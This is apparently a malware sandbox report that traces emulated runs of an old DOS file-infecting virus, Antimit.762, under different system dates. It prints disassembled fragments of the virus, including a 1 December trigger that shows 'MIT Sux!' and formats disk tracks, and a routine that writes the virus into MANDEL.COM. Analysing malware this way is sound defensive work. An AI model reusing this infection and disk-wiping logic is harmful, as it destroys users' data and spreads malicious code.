Sample viewer

vx.netlux.org/Virus.DOS.Antimit.762

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:43:34.858543689Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-17T22:43:34.861049316Z 53 PC: 12ad1 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:43:34.863721274Z 37 PC: 12ae2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:43:34.865410827Z 26 PC: 12aef | Set disk transfer address
2018-12-17T22:43:34.867016844Z 78 PC: 12af9 | Find first file
2018-12-17T22:43:34.874783351Z 79 PC: 12b1e | Find next file
2018-12-17T22:43:34.877971629Z 79 PC: 12b1e | Find next file
2018-12-17T22:43:34.880990268Z 79 PC: 12b1e | Find next file
2018-12-17T22:43:34.884594317Z 79 PC: 12b1e | Find next file
2018-12-17T22:43:34.887660947Z 79 PC: 12b1e | Find next file
2018-12-17T22:43:34.890404379Z 67 PC: 12b44 | Get or set file attributes
2018-12-17T22:43:34.897084135Z 67 PC: 12b4e | Get or set file attributes
2018-12-17T22:43:34.914410697Z 61 PC: 12b53 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:43:34.92202598Z 87 PC: 12b5c | Get or set file date and time
2018-12-17T22:43:34.924849944Z 63 PC: 12b6e | Read file or device (Read 473 bytes on handle 5)
2018-12-17T22:43:34.932144764Z 66 PC: 12b7f | Move file pointer
2018-12-17T22:43:34.933741613Z 64 PC: 12b90 | Write file or device (Write 289 bytes on handle 5)
2018-12-17T22:43:34.943269158Z 64 PC: 12ba1 | Write file or device (Write 473 bytes on handle 5)
2018-12-17T22:43:34.952645479Z 66 PC: 12bb2 | Move file pointer
2018-12-17T22:43:34.954239032Z 44 PC: 12bb8 | Get time 0x12bb8: mov byte ptr [0x105], dh
0x12bbc: call 0x22a46
0x12bbf: mov ah, 0x40
0x12bc1: mov dx, 0x100
0x12bc4: mov cx, 0x1d9
0x12bc7: int 0x21
0x12bc9: jb 0x12c0c
0x12bcb: cmp ax, 0x1d9
0x12bce: jne 0x12c0c
0x12bd0: jmp 0x12bdd
0x12bd2: mov al, 0
0x12bd4: iret
0x12bd5: sub byte ptr [di + 0x4d88], cl
0x12bd9: push bp
0x12bda: add word ptr [bx + 0x11], dx
0x12bdd: mov ax, 0x5701
0x12be0: mov cx, word ptr [0x295]
0x12be4: mov dx, word ptr [0x297]
0x12be8: and cl, 0xe0
0x12beb: or cl, 0x1f
2018-12-17T22:43:34.956747453Z 25 PC: 12a59 | Get default drive
2018-12-17T22:43:34.958544307Z 14 PC: 12a5f | Set default drive (Drive = '‡')
2018-12-17T22:43:34.959987117Z 64 PC: 12bc9 | Write file or device (Write 473 bytes on handle 5)
2018-12-17T22:43:34.966968479Z 87 PC: 12bf0 | Get or set file date and time
2018-12-17T22:43:34.969241328Z 62 PC: 12bf4 | Close file
2018-12-17T22:43:34.977315393Z 26 PC: 12bfb | Set disk transfer address
2018-12-17T22:43:34.978517831Z 37 PC: 12c0b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7928,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:57.065665212Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-25T12:02:57.0685132Z 9 PC: 12aa5 | Display string (String= 'MIT Sux! ')
2018-12-25T12:02:57.074851514Z 76 PC: 12abf | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":2,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7928,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:57.073061445Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-25T12:02:57.07616879Z 53 PC: 12ad1 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:02:57.077660341Z 37 PC: 12ae2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:02:57.079141712Z 26 PC: 12aef | Set disk transfer address
2018-12-25T12:02:57.081045178Z 78 PC: 12af9 | Find first file
2018-12-25T12:02:57.087333191Z 79 PC: 12b1e | Find next file
2018-12-25T12:02:57.090150628Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.093223971Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.096237825Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.098978794Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.101669156Z 67 PC: 12b44 | Get or set file attributes
2018-12-25T12:02:57.108413239Z 67 PC: 12b4e | Get or set file attributes
2018-12-25T12:02:57.12820269Z 61 PC: 12b53 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:02:57.137324772Z 87 PC: 12b5c | Get or set file date and time
2018-12-25T12:02:57.140053949Z 63 PC: 12b6e | Read file or device (Read 473 bytes on handle 5)
2018-12-25T12:02:57.146616252Z 66 PC: 12b7f | Move file pointer
2018-12-25T12:02:57.148090748Z 64 PC: 12b90 | Write file or device (Write 289 bytes on handle 5)
2018-12-25T12:02:57.160694287Z 64 PC: 12ba1 | Write file or device (Write 473 bytes on handle 5)
2018-12-25T12:02:57.168749312Z 66 PC: 12bb2 | Move file pointer
2018-12-25T12:02:57.170422157Z 44 PC: 12bb8 | Get time 0x12bb8: mov byte ptr [0x105], dh
0x12bbc: call 0x22a46
0x12bbf: mov ah, 0x40
0x12bc1: mov dx, 0x100
0x12bc4: mov cx, 0x1d9
0x12bc7: int 0x21
0x12bc9: jb 0x12c0c
0x12bcb: cmp ax, 0x1d9
0x12bce: jne 0x12c0c
0x12bd0: jmp 0x12bdd
0x12bd2: mov al, 0
0x12bd4: iret
0x12bd5: sub byte ptr [di + 0x4d88], cl
0x12bd9: push bp
0x12bda: add word ptr [bx + 0x11], dx
0x12bdd: mov ax, 0x5701
0x12be0: mov cx, word ptr [0x295]
0x12be4: mov dx, word ptr [0x297]
0x12be8: and cl, 0xe0
0x12beb: or cl, 0x1f
2018-12-25T12:02:57.173739204Z 25 PC: 12a59 | Get default drive
2018-12-25T12:02:57.174868421Z 14 PC: 12a5f | Set default drive (Drive = '')
2018-12-25T12:02:57.176168389Z 64 PC: 12bc9 | Write file or device (Write 473 bytes on handle 5)
2018-12-25T12:02:57.182488086Z 87 PC: 12bf0 | Get or set file date and time
2018-12-25T12:02:57.183990402Z 62 PC: 12bf4 | Close file
2018-12-25T12:02:57.189218559Z 26 PC: 12bfb | Set disk transfer address
2018-12-25T12:02:57.190057123Z 37 PC: 12c0b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7928,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:02:57.577264304Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 0xc
0x12a97: jne 0x12abf
0x12a99: cmp dl, 1
0x12a9c: jne 0x12abf
0x12a9e: mov dx, 0x127
0x12aa1: mov ah, 9
0x12aa3: int 0x21
0x12aa5: mov ah, 5
0x12aa7: mov al, 2
0x12aa9: mov ch, 0
0x12aab: mov dh, 0
0x12aad: mov dl, 0x80
0x12aaf: int 0x13
0x12ab1: mov ah, 6
0x12ab3: int 0x13
0x12ab5: mov ah, 5
0x12ab7: mov dl, 0
0x12ab9: int 0x13
0x12abb: mov ah, 0x4c
0x12abd: int 0x21
2018-12-25T12:02:57.580245462Z 53 PC: 12ad1 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:02:57.58248203Z 37 PC: 12ae2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:02:57.583656884Z 26 PC: 12aef | Set disk transfer address
2018-12-25T12:02:57.584800563Z 78 PC: 12af9 | Find first file
2018-12-25T12:02:57.592011874Z 79 PC: 12b1e | Find next file
2018-12-25T12:02:57.595218891Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.598476763Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.602733356Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.605891333Z 79 PC: 12b1e | Find next file (See above)
2018-12-25T12:02:57.60901566Z 67 PC: 12b44 | Get or set file attributes
2018-12-25T12:02:57.616024854Z 67 PC: 12b4e | Get or set file attributes
2018-12-25T12:02:57.633772639Z 61 PC: 12b53 | Open file (Filename = 'MANDEL.COM')
2018-12-25T12:02:57.641950502Z 87 PC: 12b5c | Get or set file date and time
2018-12-25T12:02:57.643740256Z 63 PC: 12b6e | Read file or device (Read 473 bytes on handle 5)
2018-12-25T12:02:57.65109162Z 66 PC: 12b7f | Move file pointer
2018-12-25T12:02:57.653048935Z 64 PC: 12b90 | Write file or device (Write 289 bytes on handle 5)
2018-12-25T12:02:57.662176186Z 64 PC: 12ba1 | Write file or device (Write 473 bytes on handle 5)
2018-12-25T12:02:57.675213764Z 66 PC: 12bb2 | Move file pointer
2018-12-25T12:02:57.677103085Z 44 PC: 12bb8 | Get time 0x12bb8: mov byte ptr [0x105], dh
0x12bbc: call 0x22a46
0x12bbf: mov ah, 0x40
0x12bc1: mov dx, 0x100
0x12bc4: mov cx, 0x1d9
0x12bc7: int 0x21
0x12bc9: jb 0x12c0c
0x12bcb: cmp ax, 0x1d9
0x12bce: jne 0x12c0c
0x12bd0: jmp 0x12bdd
0x12bd2: mov al, 0
0x12bd4: iret
0x12bd5: sub byte ptr [di + 0x4d88], cl
0x12bd9: push bp
0x12bda: add word ptr [bx + 0x11], dx
0x12bdd: mov ax, 0x5701
0x12be0: mov cx, word ptr [0x295]
0x12be4: mov dx, word ptr [0x297]
0x12be8: and cl, 0xe0
0x12beb: or cl, 0x1f
2018-12-25T12:02:57.6800021Z 25 PC: 12a59 | Get default drive
2018-12-25T12:02:57.696340004Z 14 PC: 12a5f | Set default drive (Drive = '')
2018-12-25T12:02:57.697656423Z 64 PC: 12bc9 | Write file or device (Write 473 bytes on handle 5)
2018-12-25T12:02:57.705355572Z 87 PC: 12bf0 | Get or set file date and time
2018-12-25T12:02:57.707916544Z 62 PC: 12bf4 | Close file
2018-12-25T12:02:57.716684862Z 26 PC: 12bfb | Set disk transfer address
2018-12-25T12:02:57.717931912Z 37 PC: 12c0b | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')